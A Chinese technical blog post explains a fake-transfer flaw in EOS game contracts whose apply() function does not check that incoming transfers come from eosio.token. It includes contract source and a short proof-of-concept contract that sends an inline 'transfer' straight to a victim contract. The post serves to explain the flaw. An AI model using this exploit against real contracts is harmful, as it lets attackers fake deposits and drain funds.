eos源码解析(番外1):eosio.token验证漏洞

佛日,人生有八苦,其三:求不得、怨憎会、爱离别。
说老实话,当周五bet被攻击的时候,当aabbccddeefg褥走5万柚子的时候,还是无耻邪恶了一把,当时的内心独白:“艹,我怎么没想到.....,5*30 = 120 ≈ 一套房.....”。不过,本人资质驽钝,总是后知后觉,如此,也就蛋定许多(∩_∩)。
合约要从c++变成可部署的,需要两个文件, *.wast or *.wasm,*.abi,其中*.abi是接口描述,比如:

{
  "____comment": "This file was generated by eosio-abigen. DO NOT EDIT - 2018-09-15T00:05:19",
  "version": "eosio::abi/1.0",
  "types": [],
  "structs": [{
      "name": "hi",
      "base": "",
      "fields": [{
          "name": "from",
          "type": "name"
        },{
          "name": "to",
          "type": "name"
        },{
          "name": "quantity",
          "type": "asset"
        },{
          "name": "memo",
          "type": "string"
        }
      ]
    }
  ],
  "actions": [{
      "name": "hi",
      "type": "hi",
      "ricardian_contract": ""
    }
  ],
  "tables": [],
  "ricardian_clauses": [],
  "error_messages": [],
  "abi_extensions": []
}

描述了一个合约中的“hi”函数有哪些输入,以及输入的类型。这样,在我们用“cleos push action”调用合约的时候,可以根据合约的abi解析相应的参数。
比如:

cleos  push action abc hi '["abc", "xiaomiantuan" , "0.0200 SYS","" ]' -p abc

则解析from为“abc”。
正常的话,如果没有abi,则我们无法解析传入的参数,也就无法调用合约。
我们玩一个eos的游戏,正常的套路是给这个游戏合约打钱。比如xiaomiantuan合约,我们给xiaomiantuan合约打钱,xiaomiantuan怎么知道我们给它打了钱呢?其实我们给xiaomiantuan打钱,是调用了eosio.token合约的transfer。

void token::transfer( account_name from,
                      account_name to,
                      asset        quantity,
                      string       memo )
{
    eosio_assert( from != to, "cannot transfer to self" );
    require_auth( from );
    eosio_assert( is_account( to ), "to account does not exist");
    auto sym = quantity.symbol.name();
    stats statstable( _self, sym );
    const auto& st = statstable.get( sym );

    require_recipient( from );
    require_recipient( to );

    eosio_assert( quantity.is_valid(), "invalid quantity" );
    eosio_assert( quantity.amount > 0, "must transfer positive quantity" );
    eosio_assert( quantity.symbol == st.supply.symbol, "symbol precision mismatch" );
    eosio_assert( memo.size() <= 256, "memo has more than 256 bytes" );


    sub_balance( from, quantity );
    add_balance( to, quantity, from );
}

这里,require_recipient的含义就是通知xiaomiantuan。所谓“通知”,其实是尝试调用xiaomiantuan的某个“transfer”函数。
它最终会调用xiaomiantuan中定义的:
apply( uint64_t receiver, uint64_t code, uint64_t action )
其中 receiver : xiaomiantuan ; code:eosio.token ; action: transfer

在我们写合约的时候,最后一般会有EOSIO_ABI(xxxx)

#define EOSIO_ABI( TYPE, MEMBERS ) \
extern "C" { \
   void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
      auto self = receiver; \
      if( action == N(onerror)) { \
         /* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
         eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
      } \
      if( code == self || action == N(onerror) ) { \
         TYPE thiscontract( self ); \
         switch( action ) { \
            EOSIO_API( TYPE, MEMBERS ) \
         } \
         /* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
      } \
   } \
} \

这里会做一个判断:code == self 因此如果我们不自己写apply函数,调用apply( xiaomiantuan, eosio.token, transfer )什么都不会发生,但一般来说,游戏合约会重写这个函数,使得调用发生点什么。而有的合约,并没有判断第二个参数是否是“eosio.token”,因此,傻乎乎的发生了不该发生的事,这就是今天所说的“漏洞”。
比如:

extern "C" { \
   void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
      auto self = receiver; \
      if( action == N(onerror)) { \
         /* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
         eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
      } \
     if(action == N(transfer)){\
         print("aabbccddef");\
         return;\
    }\
      if( code == self || action == N(onerror) ) { \
         TYPE thiscontract( self ); \
         switch( action ) { \
            EOSIO_API( TYPE, MEMBERS ) \
         } \
         /* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
      } \
   } \
} \

重新写了apply函数之后,并不会生成“transfer”的abi,但调用还是那个调用,不过用“cleos push action xxx”是不可能了,这一辈子都不可能了。但是,至少,好像使用require_recipient可以,哈哈。
这是因为在合约内部调用不需要像“cleos push action xxx”一样解析参数类型,此时参数已经是现成的了。所以,聪明如你,试试下面这个:

#include <eosiolib/eosio.hpp>
#include <eosiolib/asset.hpp>
#include <eosiolib/symbol.hpp>
#include <string>

using namespace eosio;

class hello : public eosio::contract {
  public:
      using contract::contract;

      /// @abi action 
      void hi( account_name from,
                      account_name to,
                      asset        quantity,
                      std::string       memo )
            {
                action(permission_level{_self, N(active)}, N(xiaomiantuan),
                N(transfer), std::make_tuple(_self, N(xiaomiantuan), quantity,
                                            std::string("")))
                .send();
            }
};

EOSIO_ABI( hello, (hi) )

上面的程序直接发起一个内联调用,参数已经直接提供,因此也不需要通过“abi”来解析参数,因此如果xiaomiantuan合约的transfer有漏洞的话,这个内联是会成功调用的。
。。。。
终于写完了,最后,,,合约真真细致的干活

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,132评论 6 478
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,802评论 2 381
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,566评论 0 338
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,858评论 1 277
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,867评论 5 368
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,695评论 1 282
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,064评论 3 399
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,705评论 0 258
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,915评论 1 300
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,677评论 2 323
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,796评论 1 333
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,432评论 4 322
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,041评论 3 307
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,992评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,223评论 1 260
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,185评论 2 352
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,535评论 2 343

推荐阅读更多精彩内容

  • EOS学习实战(三)教你如何发币!
    学习区块链,最刺激的莫过于发币,第一篇文章里介绍了如何搭建EOS开发环境,第二篇文章我们已经介绍了如何部署调用合约...
    P叔阅读 4,694评论 5 6
  • 第7课 技术小白如何在EOS上发行通证(TOKEN)?
    1. 文章摘要 【本文目标】 在EOS私链环境发行TOKEN代币,并进行转账交易。 【环境前置条件】 1)已搭建好...
    笔名辉哥阅读 2,192评论 0 51
  • EOS智能合约开发及授权(一)转账
    环境描述: 阅读本文前,假定您已经能够启动单节点EOSIO node,如果还不能正确操作,请参考官方WIKI:ht...
    future_labs阅读 3,557评论 0 1
  • 灵魂蓝图
    01 今天没有写笔记,因为书明天拿到,所以看的是另外一本书《灵魂出生前的计划》。 当我们感到困惑时,感到迷茫时,感...
    嫒塔罗阅读 784评论 0 2
  • 无标题文章
    今天早上,坐车没有闭目一下,养神,导致精力不充沛。把,单位分类,服务,二把关键人打印出来,随身携带
    谢其国阅读 149评论 0 1